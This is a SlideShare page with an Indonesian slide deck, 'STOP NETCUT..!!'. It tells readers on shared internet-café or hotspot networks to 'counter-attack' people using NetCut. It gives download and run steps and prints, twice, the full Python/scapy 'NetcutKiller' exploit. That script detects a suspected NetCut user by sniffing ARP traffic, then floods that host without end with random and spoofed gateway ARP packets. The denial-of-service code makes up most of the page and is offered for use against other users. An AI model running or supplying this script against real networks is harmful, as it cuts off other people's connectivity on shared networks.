SlideShare a Scribd company logo
1 of 9
Download to read offline
Koneksi putus bukan menjadi sebuah dilema lagi, melainkan bisa dikarenakan beberapa sebab.
Terutama di hotspot gratisan atau di warnet-warnet, kalau koneksi kita lemot dan tidak bisa akses
internet dengan tidak normal, mungkin salah satunya karena ada pengguna warnet lainnya yang
menggunakan NETCUT.
Agar tidak bete karena loading lama, serang balik saja pengguna NETCUT tersebut.
1. Harus sudah terdapat python compiler di komputer
2. Download toolsnya disini: http://1337day.com/exploits/17338
3. Jalankan tools tersebut dengan compile: python filenameexploit.py [ethernet]
[macaddress], contoh: python netcutkiller.py eth0 A1:B2:C3:D4:E5:F6
Code exploitnya adalah sebagai berikut:

 #!/usr/bin/env python

 #Exploit Title: Netcut Denial of Service Vulnerability

 #Author: MaYaSeVeN

 #Greetz: Inj3ct0r 1337day Exploit DataBase (1337day.com)

 #Blog: http://mayaseven.blogspot.com

 #PoC: Video http://www.youtube.com/user/mayaseven

 #Picture http://3.bp.blogspot.com/-
GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png

 #Version: Netcut 2

 #Software Link: http://www.mediafire.com/?jiiyq2wcpp41266

 #Tested on: Windows Xp, Windows 7

 #Greetz : ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE,
Sumedt, Rocky Sharma



 from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf

 import commands,os,sys



 #gw_mac = commands.getoutput("arp -i %s | grep %s" %
(conf.iface,conf.iface)).split()[2]

 gw_ip = commands.getoutput("ip route list | grep default").split()[2]



 def protect(gw_ip,gw_mac):

 os.popen("arp -s %s %s" %(gw_ip,gw_mac))

 print "Protected himself"



 def detect():

 ans = sniff(filter='arp',timeout=7)

 target=[]

 for r in ans.res:

 target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%"))

 return target



 def preattack(gw_ip):

 num = []

 count = 0

 target = 0

 temp = 0

 print "Detecting..."

 d = detect()

 for i in range(len(d)):

 if d[i].split()[0] == "255.255.255.255":

 num.append(d.count(d[i]))

 if d.count(d[i]) > count:

 count = d.count(d[i])

 target = i

 if d[i].split()[0] == gw_ip:

 temp += 1

 if len(d) < 7:

 print "[-] No one use Netcut or try again"

 exit()

 if len(num)*7 < temp:

 num[:] = []

 count = 0

 result = float(temp)/len(d)*100

 for j in range(len(d)):

 if d[i].split()[0] == gw_ip:

 num.append(d.count(d[j]))

 if d.count(d[i]) > count:

 count = d.count(d[i])

 target = i

 num.reverse()

 result = float(temp)/len(d)*100

 print target

 else:

 num.reverse()

 result = float(num[0]+temp)/len(d)*100



 print "There is a possibility that " + str(result) + "%"

 if result>= 50:

 target_mac = d[target].split()[1]

 target_ip = d[target].split()[2]

 print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac)

 attack(target_mac,target_ip,gw_ip)

 else:

 print "[-] No one use Netcut or try again"



 def attack(target_mac,target_ip,gw_ip):

 print "[+]Counter Attack !!!"

 e = Ether(dst="FF:FF:FF:FF:FF:FF")

 while 1:

 a =
ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=
1)

 p = e/a/Padding("x00"*18)

 sendp(p,verbose=0)

 a1 =
ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2)

 p1 = e/a1/Padding("x00"*18)

 sendp(p1,verbose=0)



 if __name__ == '__main__':

 os.system("clear")

 print "###################################################"

 print " __ __ __ __ _____ __ __ _ _"

 print "| / |   / / / ____|   / / |  | |"

 print "|  / | __  _/ /_ _| (___ __  / /__| | |"

 print "| |/| |/ _  / _ |___  / _  / / _  .  |"

 print "| | | | (_| || | (_| |____) | __/ / __/ | |"

 print "|_| |_|__,_||_|__,_|_____/ ___| / ___|_| _|"

 print " "

 print "###################################################"

 print ""

 print "http://mayaseven.blogspot.com"

 print ""

 if len(sys.argv) == 2 or len(sys.argv) == 3:

 if len(sys.argv) == 2:

 conf.iface=sys.argv[1]

 preattack(gw_ip)

 if len(sys.argv) == 3:

 conf.iface=sys.argv[1]

 gw_mac = sys.argv[2]

 protect(gw_ip,gw_mac)

 preattack(gw_ip)

 else:

 print '''Mode:

 1.)Attack only

 Usage: NetcutKiller

 e.g. NetcutKiller.py wlan0



 2.)Attack with protect himself

 Usage: NetcutKiller

 e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF

 '''





 # 1337day.com [2012-01-04]

More Related Content

Similar to STOP NETCUT..!!

Gdc09 Minigames
Gdc09 MinigamesGdc09 Minigames
Gdc09 MinigamesSusan Gold
 
Android Wear 2.0 - Great Changes Upcoming This Fall - GDG DevFest Ukraine 2016
Android Wear 2.0 - Great Changes Upcoming This Fall - GDG DevFest Ukraine 2016Android Wear 2.0 - Great Changes Upcoming This Fall - GDG DevFest Ukraine 2016
Android Wear 2.0 - Great Changes Upcoming This Fall - GDG DevFest Ukraine 2016Constantine Mars
 
Python Network Programming – Course Applications Guide
Python Network Programming – Course Applications GuidePython Network Programming – Course Applications Guide
Python Network Programming – Course Applications GuideMihai Catalin Teodosiu
 
Static analysis of C++ source code
Static analysis of C++ source codeStatic analysis of C++ source code
Static analysis of C++ source codeAndrey Karpov
 
Static analysis of C++ source code
Static analysis of C++ source codeStatic analysis of C++ source code
Static analysis of C++ source codePVS-Studio
 
Track c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -eveTrack c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -evechiportal
 
dokumen.tips_cara-setting-mikrotik-pppoe.doc
dokumen.tips_cara-setting-mikrotik-pppoe.docdokumen.tips_cara-setting-mikrotik-pppoe.doc
dokumen.tips_cara-setting-mikrotik-pppoe.dochendraakbar2
 
The following code is an implementation of the producer consumer pro.pdf
The following code is an implementation of the producer consumer pro.pdfThe following code is an implementation of the producer consumer pro.pdf
The following code is an implementation of the producer consumer pro.pdfmarketing413921
 
How Secure Are Docker Containers?
How Secure Are Docker Containers?How Secure Are Docker Containers?
How Secure Are Docker Containers?Ben Hall
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Vincenzo Iozzo
 
Intermediate Intel® Distribution of OpenVINO™ toolkit for Computer Vision Ap...
 Intermediate Intel® Distribution of OpenVINO™ toolkit for Computer Vision Ap... Intermediate Intel® Distribution of OpenVINO™ toolkit for Computer Vision Ap...
Intermediate Intel® Distribution of OpenVINO™ toolkit for Computer Vision Ap...kkaralek
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityIOSR Journals
 
PyHEP 2018: Tools to bind to Python
PyHEP 2018:  Tools to bind to PythonPyHEP 2018:  Tools to bind to Python
PyHEP 2018: Tools to bind to PythonHenry Schreiner
 
Self scaling Multi cloud nomad workloads
Self scaling Multi cloud nomad workloadsSelf scaling Multi cloud nomad workloads
Self scaling Multi cloud nomad workloadsBram Vogelaar
 
XebiCon'17 : Faites chauffer les neurones de votre Smartphone avec du Deep Le...
XebiCon'17 : Faites chauffer les neurones de votre Smartphone avec du Deep Le...XebiCon'17 : Faites chauffer les neurones de votre Smartphone avec du Deep Le...
XebiCon'17 : Faites chauffer les neurones de votre Smartphone avec du Deep Le...Publicis Sapient Engineering
 
Python-GTK
Python-GTKPython-GTK
Python-GTKYuren Ju
 
How I Built a Power Debugger Out of the Standard Library and Things I Found o...
How I Built a Power Debugger Out of the Standard Library and Things I Found o...How I Built a Power Debugger Out of the Standard Library and Things I Found o...
How I Built a Power Debugger Out of the Standard Library and Things I Found o...doughellmann
 
Rust "Hot or Not" at Sioux
Rust "Hot or Not" at SiouxRust "Hot or Not" at Sioux
Rust "Hot or Not" at Siouxnikomatsakis
 

Similar to STOP NETCUT..!! (20)

Gdc09 Minigames
Gdc09 MinigamesGdc09 Minigames
Gdc09 Minigames
 
Android Wear 2.0 - Great Changes Upcoming This Fall - GDG DevFest Ukraine 2016
Android Wear 2.0 - Great Changes Upcoming This Fall - GDG DevFest Ukraine 2016Android Wear 2.0 - Great Changes Upcoming This Fall - GDG DevFest Ukraine 2016
Android Wear 2.0 - Great Changes Upcoming This Fall - GDG DevFest Ukraine 2016
 
Python Network Programming – Course Applications Guide
Python Network Programming – Course Applications GuidePython Network Programming – Course Applications Guide
Python Network Programming – Course Applications Guide
 
Static analysis of C++ source code
Static analysis of C++ source codeStatic analysis of C++ source code
Static analysis of C++ source code
 
Static analysis of C++ source code
Static analysis of C++ source codeStatic analysis of C++ source code
Static analysis of C++ source code
 
Track c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -eveTrack c-High speed transaction-based hw-sw coverification -eve
Track c-High speed transaction-based hw-sw coverification -eve
 
dokumen.tips_cara-setting-mikrotik-pppoe.doc
dokumen.tips_cara-setting-mikrotik-pppoe.docdokumen.tips_cara-setting-mikrotik-pppoe.doc
dokumen.tips_cara-setting-mikrotik-pppoe.doc
 
The following code is an implementation of the producer consumer pro.pdf
The following code is an implementation of the producer consumer pro.pdfThe following code is an implementation of the producer consumer pro.pdf
The following code is an implementation of the producer consumer pro.pdf
 
How Secure Are Docker Containers?
How Secure Are Docker Containers?How Secure Are Docker Containers?
How Secure Are Docker Containers?
 
Cc code cards
Cc code cardsCc code cards
Cc code cards
 
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
Post Exploitation Bliss: Loading Meterpreter on a Factory iPhone, Black Hat U...
 
Intermediate Intel® Distribution of OpenVINO™ toolkit for Computer Vision Ap...
 Intermediate Intel® Distribution of OpenVINO™ toolkit for Computer Vision Ap... Intermediate Intel® Distribution of OpenVINO™ toolkit for Computer Vision Ap...
Intermediate Intel® Distribution of OpenVINO™ toolkit for Computer Vision Ap...
 
Penetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utilityPenetrating Windows 8 with syringe utility
Penetrating Windows 8 with syringe utility
 
Bsides final
Bsides finalBsides final
Bsides final
 
PyHEP 2018: Tools to bind to Python
PyHEP 2018:  Tools to bind to PythonPyHEP 2018:  Tools to bind to Python
PyHEP 2018: Tools to bind to Python
 
Self scaling Multi cloud nomad workloads
Self scaling Multi cloud nomad workloadsSelf scaling Multi cloud nomad workloads
Self scaling Multi cloud nomad workloads
 
XebiCon'17 : Faites chauffer les neurones de votre Smartphone avec du Deep Le...
XebiCon'17 : Faites chauffer les neurones de votre Smartphone avec du Deep Le...XebiCon'17 : Faites chauffer les neurones de votre Smartphone avec du Deep Le...
XebiCon'17 : Faites chauffer les neurones de votre Smartphone avec du Deep Le...
 
Python-GTK
Python-GTKPython-GTK
Python-GTK
 
How I Built a Power Debugger Out of the Standard Library and Things I Found o...
How I Built a Power Debugger Out of the Standard Library and Things I Found o...How I Built a Power Debugger Out of the Standard Library and Things I Found o...
How I Built a Power Debugger Out of the Standard Library and Things I Found o...
 
Rust "Hot or Not" at Sioux
Rust "Hot or Not" at SiouxRust "Hot or Not" at Sioux
Rust "Hot or Not" at Sioux
 

More from Martindra K

KEMENKES no. 375 TENTANG STANDAR PROFESI RADIOGRAFER 2007
KEMENKES no. 375 TENTANG STANDAR PROFESI RADIOGRAFER 2007KEMENKES no. 375 TENTANG STANDAR PROFESI RADIOGRAFER 2007
KEMENKES no. 375 TENTANG STANDAR PROFESI RADIOGRAFER 2007Martindra K
 
JENIS JENIS NARKOBA DAN BAHAYANYA..!!
JENIS JENIS NARKOBA DAN BAHAYANYA..!!JENIS JENIS NARKOBA DAN BAHAYANYA..!!
JENIS JENIS NARKOBA DAN BAHAYANYA..!!Martindra K
 
Cara transfer file via wifi
Cara transfer file via wifiCara transfer file via wifi
Cara transfer file via wifiMartindra K
 
CARA PARTISI SD CARD
CARA PARTISI SD CARDCARA PARTISI SD CARD
CARA PARTISI SD CARDMartindra K
 
CONTOH SURAT PERJANJIAN KONTRAK RUMAH
CONTOH SURAT PERJANJIAN KONTRAK RUMAH CONTOH SURAT PERJANJIAN KONTRAK RUMAH
CONTOH SURAT PERJANJIAN KONTRAK RUMAH Martindra K
 
STANDAR PELAYANAN RADIOLOGI DIAGNOSTIK DI SARANA PELAYANAN KESEHATAN
STANDAR PELAYANAN RADIOLOGI DIAGNOSTIK DI SARANA PELAYANAN KESEHATANSTANDAR PELAYANAN RADIOLOGI DIAGNOSTIK DI SARANA PELAYANAN KESEHATAN
STANDAR PELAYANAN RADIOLOGI DIAGNOSTIK DI SARANA PELAYANAN KESEHATANMartindra K
 
Jenis jenis gemstone
Jenis jenis gemstoneJenis jenis gemstone
Jenis jenis gemstoneMartindra K
 
Permenkes no.780 th 2008
Permenkes no.780 th 2008Permenkes no.780 th 2008
Permenkes no.780 th 2008Martindra K
 

More from Martindra K (9)

KEMENKES no. 375 TENTANG STANDAR PROFESI RADIOGRAFER 2007
KEMENKES no. 375 TENTANG STANDAR PROFESI RADIOGRAFER 2007KEMENKES no. 375 TENTANG STANDAR PROFESI RADIOGRAFER 2007
KEMENKES no. 375 TENTANG STANDAR PROFESI RADIOGRAFER 2007
 
JENIS JENIS NARKOBA DAN BAHAYANYA..!!
JENIS JENIS NARKOBA DAN BAHAYANYA..!!JENIS JENIS NARKOBA DAN BAHAYANYA..!!
JENIS JENIS NARKOBA DAN BAHAYANYA..!!
 
Cara transfer file via wifi
Cara transfer file via wifiCara transfer file via wifi
Cara transfer file via wifi
 
CARA PARTISI SD CARD
CARA PARTISI SD CARDCARA PARTISI SD CARD
CARA PARTISI SD CARD
 
CONTOH SURAT PERJANJIAN KONTRAK RUMAH
CONTOH SURAT PERJANJIAN KONTRAK RUMAH CONTOH SURAT PERJANJIAN KONTRAK RUMAH
CONTOH SURAT PERJANJIAN KONTRAK RUMAH
 
STANDAR PELAYANAN RADIOLOGI DIAGNOSTIK DI SARANA PELAYANAN KESEHATAN
STANDAR PELAYANAN RADIOLOGI DIAGNOSTIK DI SARANA PELAYANAN KESEHATANSTANDAR PELAYANAN RADIOLOGI DIAGNOSTIK DI SARANA PELAYANAN KESEHATAN
STANDAR PELAYANAN RADIOLOGI DIAGNOSTIK DI SARANA PELAYANAN KESEHATAN
 
Jenis jenis gemstone
Jenis jenis gemstoneJenis jenis gemstone
Jenis jenis gemstone
 
Permenkes no.780 th 2008
Permenkes no.780 th 2008Permenkes no.780 th 2008
Permenkes no.780 th 2008
 
DOA UMROH
DOA UMROHDOA UMROH
DOA UMROH
 

Recently uploaded

Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa494f574xmv
 
Unidad 4 – Redes de ordenadores (en inglés).pptx
Unidad 4 – Redes de ordenadores (en inglés).pptxUnidad 4 – Redes de ordenadores (en inglés).pptx
Unidad 4 – Redes de ordenadores (en inglés).pptxmibuzondetrabajo
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书zdzoqco
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书rnrncn29
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书rnrncn29
 
TRENDS Enabling and inhibiting dimensions.pptx
TRENDS Enabling and inhibiting dimensions.pptxTRENDS Enabling and inhibiting dimensions.pptx
TRENDS Enabling and inhibiting dimensions.pptxAndrieCagasanAkio
 
Company Snapshot Theme for Business by Slidesgo.pptx
Company Snapshot Theme for Business by Slidesgo.pptxCompany Snapshot Theme for Business by Slidesgo.pptx
Company Snapshot Theme for Business by Slidesgo.pptxMario
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationLinaWolf1
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predieusebiomeyer
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxDyna Gilbert
 
IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119APNIC
 

Recently uploaded (11)

Film cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasaFilm cover research (1).pptxsdasdasdasdasdasa
Film cover research (1).pptxsdasdasdasdasdasa
 
Unidad 4 – Redes de ordenadores (en inglés).pptx
Unidad 4 – Redes de ordenadores (en inglés).pptxUnidad 4 – Redes de ordenadores (en inglés).pptx
Unidad 4 – Redes de ordenadores (en inglés).pptx
 
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
办理多伦多大学毕业证成绩单|购买加拿大UTSG文凭证书
 
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
『澳洲文凭』买詹姆士库克大学毕业证书成绩单办理澳洲JCU文凭学位证书
 
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
『澳洲文凭』买拉筹伯大学毕业证书成绩单办理澳洲LTU文凭学位证书
 
TRENDS Enabling and inhibiting dimensions.pptx
TRENDS Enabling and inhibiting dimensions.pptxTRENDS Enabling and inhibiting dimensions.pptx
TRENDS Enabling and inhibiting dimensions.pptx
 
Company Snapshot Theme for Business by Slidesgo.pptx
Company Snapshot Theme for Business by Slidesgo.pptxCompany Snapshot Theme for Business by Slidesgo.pptx
Company Snapshot Theme for Business by Slidesgo.pptx
 
PHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 DocumentationPHP-based rendering of TYPO3 Documentation
PHP-based rendering of TYPO3 Documentation
 
SCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is prediSCM Symposium PPT Format Customer loyalty is predi
SCM Symposium PPT Format Customer loyalty is predi
 
Top 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptxTop 10 Interactive Website Design Trends in 2024.pptx
Top 10 Interactive Website Design Trends in 2024.pptx
 
IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119IP addressing and IPv6, presented by Paul Wilson at IETF 119
IP addressing and IPv6, presented by Paul Wilson at IETF 119
 

STOP NETCUT..!!

  • 1. Koneksi putus bukan menjadi sebuah dilema lagi, melainkan bisa dikarenakan beberapa sebab. Terutama di hotspot gratisan atau di warnet-warnet, kalau koneksi kita lemot dan tidak bisa akses internet dengan tidak normal, mungkin salah satunya karena ada pengguna warnet lainnya yang menggunakan NETCUT. Agar tidak bete karena loading lama, serang balik saja pengguna NETCUT tersebut. 1. Harus sudah terdapat python compiler di komputer 2. Download toolsnya disini: http://1337day.com/exploits/17338 3. Jalankan tools tersebut dengan compile: python filenameexploit.py [ethernet] [macaddress], contoh: python netcutkiller.py eth0 A1:B2:C3:D4:E5:F6 Code exploitnya adalah sebagai berikut:   #!/usr/bin/env python   #Exploit Title: Netcut Denial of Service Vulnerability   #Author: MaYaSeVeN   #Greetz: Inj3ct0r 1337day Exploit DataBase (1337day.com)   #Blog: http://mayaseven.blogspot.com   #PoC: Video http://www.youtube.com/user/mayaseven
  • 2.   #Picture http://3.bp.blogspot.com/- GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png   #Version: Netcut 2   #Software Link: http://www.mediafire.com/?jiiyq2wcpp41266   #Tested on: Windows Xp, Windows 7   #Greetz : ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma     from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf   import commands,os,sys     #gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]   gw_ip = commands.getoutput("ip route list | grep default").split()[2]     def protect(gw_ip,gw_mac):   os.popen("arp -s %s %s" %(gw_ip,gw_mac)) 
  • 3.  print "Protected himself"     def detect():   ans = sniff(filter='arp',timeout=7)   target=[]   for r in ans.res:   target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%"))   return target     def preattack(gw_ip):   num = []   count = 0   target = 0   temp = 0   print "Detecting..."   d = detect()
  • 4.   for i in range(len(d)):   if d[i].split()[0] == "255.255.255.255":   num.append(d.count(d[i]))   if d.count(d[i]) > count:   count = d.count(d[i])   target = i   if d[i].split()[0] == gw_ip:   temp += 1   if len(d) < 7:   print "[-] No one use Netcut or try again"   exit()   if len(num)*7 < temp:   num[:] = []   count = 0   result = float(temp)/len(d)*100 
  • 5.  for j in range(len(d)):   if d[i].split()[0] == gw_ip:   num.append(d.count(d[j]))   if d.count(d[i]) > count:   count = d.count(d[i])   target = i   num.reverse()   result = float(temp)/len(d)*100   print target   else:   num.reverse()   result = float(num[0]+temp)/len(d)*100     print "There is a possibility that " + str(result) + "%"   if result>= 50:   target_mac = d[target].split()[1]
  • 6.   target_ip = d[target].split()[2]   print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac)   attack(target_mac,target_ip,gw_ip)   else:   print "[-] No one use Netcut or try again"     def attack(target_mac,target_ip,gw_ip):   print "[+]Counter Attack !!!"   e = Ether(dst="FF:FF:FF:FF:FF:FF")   while 1:   a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op= 1)   p = e/a/Padding("x00"*18)   sendp(p,verbose=0)   a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2) 
  • 7.  p1 = e/a1/Padding("x00"*18)   sendp(p1,verbose=0)     if __name__ == '__main__':   os.system("clear")   print "###################################################"   print " __ __ __ __ _____ __ __ _ _"   print "| / | / / / ____| / / | | |"   print "| / | __ _/ /_ _| (___ __ / /__| | |"   print "| |/| |/ _ / _ |___ / _ / / _ . |"   print "| | | | (_| || | (_| |____) | __/ / __/ | |"   print "|_| |_|__,_||_|__,_|_____/ ___| / ___|_| _|"   print " "   print "###################################################"   print ""   print "http://mayaseven.blogspot.com"
  • 8.   print ""   if len(sys.argv) == 2 or len(sys.argv) == 3:   if len(sys.argv) == 2:   conf.iface=sys.argv[1]   preattack(gw_ip)   if len(sys.argv) == 3:   conf.iface=sys.argv[1]   gw_mac = sys.argv[2]   protect(gw_ip,gw_mac)   preattack(gw_ip)   else:   print '''Mode:   1.)Attack only   Usage: NetcutKiller   e.g. NetcutKiller.py wlan0 
  • 9.    2.)Attack with protect himself   Usage: NetcutKiller   e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF   '''       # 1337day.com [2012-01-04]